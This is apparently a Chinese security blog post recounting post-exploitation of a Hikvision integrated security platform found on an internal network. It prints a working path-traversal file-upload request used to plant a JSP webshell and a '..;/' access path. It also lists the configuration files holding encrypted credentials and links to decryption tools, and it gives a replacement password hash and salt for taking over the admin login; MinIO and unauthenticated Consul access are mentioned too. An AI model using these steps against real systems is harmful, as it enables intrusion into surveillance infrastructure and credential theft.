闲聊
最近工作繁忙,今日抽空上来看看公众号,好家伙发现好多私信,说我在忙什么好久不更新,今天刚好有点时间就给大家更新一期。
getshell
这里开始就直接在内网中扫到的综合安防,就用了一个任意文件上传Nday拿下权限,目标也没有任何的杀软什么的,就直接传了马子
POST /svm/api/external/report HTTP/1.1
Host: 172.16.15.200
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
Content-Length: 308
------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip
<%out.print("test");%>
------WebKitFormBoundary9PggsiM755PLa54a--
再次访问我们上传的文件
/portal/ui/login/..;/..;/new.jsp
进来之后直接就是root权限,看了下进程信息和一些基本网络信息,也不通其他段所以就只能研究研究这个海康了
以下是海康的网站目录,还是挺震撼的,一看不止有海康的web,还有海康自带的其他web都在这目录下,比如minio、Consul 等等一些数据库的配置文件什么的都在这里了
海康解密
首先是找到了海康的配置文件,拿到了数据库的密码,这里是加密的
/opt/hikvision/web/opsMgrCenter/conf/config.properties #海康数据库配置文件
当然了我也是把海康所有的敏感配置文件都列出来了
1. /opt/hikvision/web/components/ntp.1/conf/config.properties
NTP 服务:网络时间协议 (NTP) 的配置文件,用于时间同步。可能包含 NTP 服务器的认证信息。
2. /opt/hikvision/web/components/activemq514linux64.1/conf/config.properties
ActiveMQ:消息队列服务的配置文件。可能包含用于连接 ActiveMQ 服务的用户名和密码。
3. /opt/hikvision/web/components/cluster.1/conf/config.properties
Cluster:集群配置文件,用于管理多台服务器的集群。可能包含集群管理的认证信息。
4. /opt/hikvision/web/components/lm.1/conf/config.properties
License Manager:许可证管理服务的配置文件。可能包含用于连接许可证服务器的用户名和密码。
5. /opt/hikvision/web/components/ls.1/conf/config.properties
Logging Service:日志服务的配置文件。可能包含用于连接日志服务器的认证信息。
6. /opt/hikvision/web/components/lsm.1/conf/config.properties
License Server Manager:许可证服务器管理服务的配置文件。可能包含用于连接许可证服务器的用户名和密码。
7. /opt/hikvision/web/components/mps.1/conf/config.properties
Media Processing Service:媒体处理服务的配置文件。可能包含用于连接媒体处理服务的用户名和密码。
8. /opt/hikvision/web/components/nodejslinux64.1/conf/config.properties
Node.js:Node.js 环境的配置文件。可能包含 Node.js 应用的配置和认证信息。
9. /opt/hikvision/web/components/openjdk11linux64.1/conf/config.properties
OpenJDK:Java 环境的配置文件。可能包含 Java 应用的配置和认证信息。
10. /opt/hikvision/web/components/postgresql11linux64.1/conf/config.properties
PostgreSQL:PostgreSQL 数据库的配置文件。通常包含数据库的连接信息,包括用户名和密码。
11. /opt/hikvision/web/components/redislinux64.1/conf/config.properties
Redis:Redis 数据库的配置文件。通常包含 Redis 的连接信息,包括认证密码。
12. /opt/hikvision/web/components/reportservice.1/conf/config.properties
Report Service:报表服务的配置文件。可能包含用于连接报表服务的认证信息。
13. /opt/hikvision/web/components/svm.1/conf/config.properties
Service Virtual Machine:服务虚拟机的配置文件。可能包含虚拟机服务的配置和认证信息。
14. /opt/hikvision/web/components/tomcat85linux64.1/conf/config.properties
Tomcat:Tomcat Web 服务器的配置文件。通常包含用于管理 Tomcat 服务器的用户名和密码。
解密海康配置文件中所有密码
这里给大家分享两个工具
综合解密工具:https://github.com/wafinfo/DecryptTools
海康专属解密工具:https://github.com/wafinfo/Hikvision
OK下面继续切入正题,这里我解密的他的postgres数据库密码后连上去后就找center_user这个表
海康的综合安防不止有有个这样的页面,相信大家这个页面是见的较多的
这里我有个问题,就是我没找到这个页面的账号密码,如果大佬们知道可以交流交流
他还有一个运营管理平台在其他的端口,默认是8001好像,我这里是8001,一般都会改这个端口,他就长这样
我们找到center_user这个表之后,就需要用到我前面说的海康专属解密工具来生成一个密文直接替换进去就可以登录了
直接运行工具就会有的,就按他说的来把这段密文替换进去就ok了
passwword:983605f69b7a3a91187eb301eda62bbde9513ea706821b3e93ccdadbfe055b88
salt:c4ca4238a0b923820dcc509a6f75849b
替换了之后我们就可以登进来了,登进来就这样的,就和集权设备是一样一样的
OK除了以上这些,海康还有别的web,下面听我娓娓道来
web权限
minio权限
查看进程发现minio运行目录
是的你没看错,这是海康自带的minio而不是单独的,minio的账号密码也是加密的,在配置文件的最下面就可以看到accesskey和secrtkey
/opt/hikvision/web/components/minio.1/conf/config.properties
解密之后直接就给他拿下
哦对了还有一个web差点忘了,当当当当!
Consul by HashiCorp控制台未授权
没错就是他,直接访问就可以看到海康的接口信息吧应该,有时候还能翻到一些账号密码,我这里是网页翻译的,所以有些不准
ActiveMQ
海康还有个ActiveMQ,但是呢我这个不知道为什么就是登不上去,大家遇到了可以试试,我这就不放图了
总结
当然了以上是我自己找到的一些web,如果还有其他的web记得偷偷告诉我,还有就是数据库的有,一般海康都会有2个或2个以上数据库,总之多看看他的那些配置文件总能给你意外的惊喜。
原文始发于微信公众号(web安全初心实验室):记一次海康安防后渗透不完整版
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论